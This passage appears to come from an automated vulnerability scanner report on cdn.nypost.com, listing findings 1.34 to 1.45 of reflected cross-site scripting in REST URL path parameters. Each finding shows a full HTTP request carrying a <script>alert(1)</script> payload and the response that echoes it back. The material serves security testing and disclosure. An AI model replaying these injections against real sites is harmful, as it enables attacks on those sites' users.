The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f42e3<script>alert(1)</script>e29f3d647b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostf42e3<script>alert(1)</script>e29f3d647b0/blocks/search/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostf42e3<script>alert(1)</script>e29f3d647b0/blocks/search/search.js</p>
...[SNIP]...

1.34. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e1dc2<script>alert(1)</script>e80da1bb8ae was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blockse1dc2<script>alert(1)</script>e80da1bb8ae/search/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blockse1dc2<script>alert(1)</script>e80da1bb8ae/search/search.js</p>
...[SNIP]...

1.35. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 53ada<script>alert(1)</script>e4c7fa34ff6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/search53ada<script>alert(1)</script>e4c7fa34ff6/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:51 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/search53ada<script>alert(1)</script>e4c7fa34ff6/search.js</p>
...[SNIP]...

1.36. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7df87<script>alert(1)</script>47f6c2355f3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/search/search.js7df87<script>alert(1)</script>47f6c2355f3 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:59 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/search/search.js7df87<script>alert(1)</script>47f6c2355f3</p>
...[SNIP]...

1.37. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dc166<script>alert(1)</script>298a974b0f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigdc166<script>alert(1)</script>298a974b0f5/WebPortal/nypost/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigdc166<script>alert(1)</script>298a974b0f5/WebPortal/nypost/blocks/section_blocks/section_blocks.js</p>
...[SNIP]...

1.38. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b090a<script>alert(1)</script>952fd63b810 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalb090a<script>alert(1)</script>952fd63b810/nypost/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalb090a<script>alert(1)</script>952fd63b810/nypost/blocks/section_blocks/section_blocks.js</p>
...[SNIP]...

1.39. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5636a<script>alert(1)</script>1c170b9b73d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost5636a<script>alert(1)</script>1c170b9b73d/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost5636a<script>alert(1)</script>1c170b9b73d/blocks/section_blocks/section_blocks.js</p>
...[SNIP]...

1.40. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5bab6<script>alert(1)</script>2768fc0b80f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks5bab6<script>alert(1)</script>2768fc0b80f/section_blocks/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks5bab6<script>alert(1)</script>2768fc0b80f/section_blocks/section_blocks.js</p>
...[SNIP]...

1.41. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d2684<script>alert(1)</script>4a61dbbb73d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/section_blocksd2684<script>alert(1)</script>4a61dbbb73d/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/section_blocksd2684<script>alert(1)</script>4a61dbbb73d/section_blocks.js</p>
...[SNIP]...

1.42. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 95cdc<script>alert(1)</script>31cb68a600b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js95cdc<script>alert(1)</script>31cb68a600b HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js95cdc<script>alert(1)</script>31cb68a600b</p>
...[SNIP]...

1.43. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e57d<script>alert(1)</script>376ef1728a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig9e57d<script>alert(1)</script>376ef1728a8/WebPortal/nypost/blocks/shareit/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:23 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig9e57d<script>alert(1)</script>376ef1728a8/WebPortal/nypost/blocks/shareit/shareit.js</p>
...[SNIP]...

1.44. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2af3f<script>alert(1)</script>14cecd8da29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal2af3f<script>alert(1)</script>14cecd8da29/nypost/blocks/shareit/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal2af3f<script>alert(1)</script>14cecd8da29/nypost/blocks/shareit/shareit.js</p>
...[SNIP]...

1.45. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb3fb<script>alert(1)</script>b193c16edc8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostfb3fb<script>alert(1)</script>b193c16edc8/blocks/shareit/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:38 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostfb3fb<script>alert(1)</script>b193c16edc8/blocks/shareit/shareit.js</p>
...[SNIP]...

